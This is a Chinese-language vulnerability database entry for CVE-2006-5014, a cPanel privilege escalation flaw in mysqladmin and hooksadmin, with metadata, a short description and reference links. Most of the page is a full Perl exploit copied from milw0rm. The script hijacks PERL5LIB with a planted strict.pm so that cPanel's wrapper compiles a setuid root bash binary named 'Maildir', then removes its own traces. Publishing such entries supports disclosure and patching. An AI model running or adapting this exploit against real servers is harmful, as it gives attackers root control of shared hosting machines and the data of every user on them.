CPanel 特权提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111180 漏洞类型 访问验证错误
发布时间 2006-10-01 更新时间 2006-10-01
CVE编号 CVE-2006-5014 CNNVD-ID CNNVD-200609-450
漏洞平台 Linux CVSS评分 9.0
|漏洞来源
https://www.exploit-db.com/exploits/2466
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-450
|漏洞详情
cPanel中存在未指定漏洞,远程认证的用户可以通过(1)mysqladmin和(2)hooksadmin中的未明向量获取特权。
|漏洞EXP
#!/usr/bin/perl -w

# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait..

my $cpwrap       = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap    = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd          = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";

if ( ! -x "/usr/bin/gcc" )  { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" )       { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" )    { die "$mysqlwrap: $!\n"; }

open  (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
   if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);

open  (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print  STRICT  "\$e  = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print  STRICT  "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print  STRICT  "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print  STRICT  "system(\"/bin/chmod 4755 Maildir\");\n";
print  STRICT  "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);

system("$mysqlwrap DUMPMYSQL 2>/dev/null");

if ( -e "Maildir" ) {
   system("./Maildir");
}
else {
   unlink "strict.pm";
   die "Failed\n";
}

# milw0rm.com [2006-10-01]
|参考资料

来源:SECUNIA
名称:22072
链接:http://secunia.com/advisories/22072
来源:BID
名称:20163
链接:http://www.securityfocus.com/bid/20163
来源:SECTRACK
名称:1016913
链接:http://securitytracker.com/id?1016913
来源:forums.cpanel.net
链接:http://forums.cpanel.net/showthread.php?t=58134
来源:changelog.cpanel.net
链接:http://changelog.cpanel.net/?build=&showall=1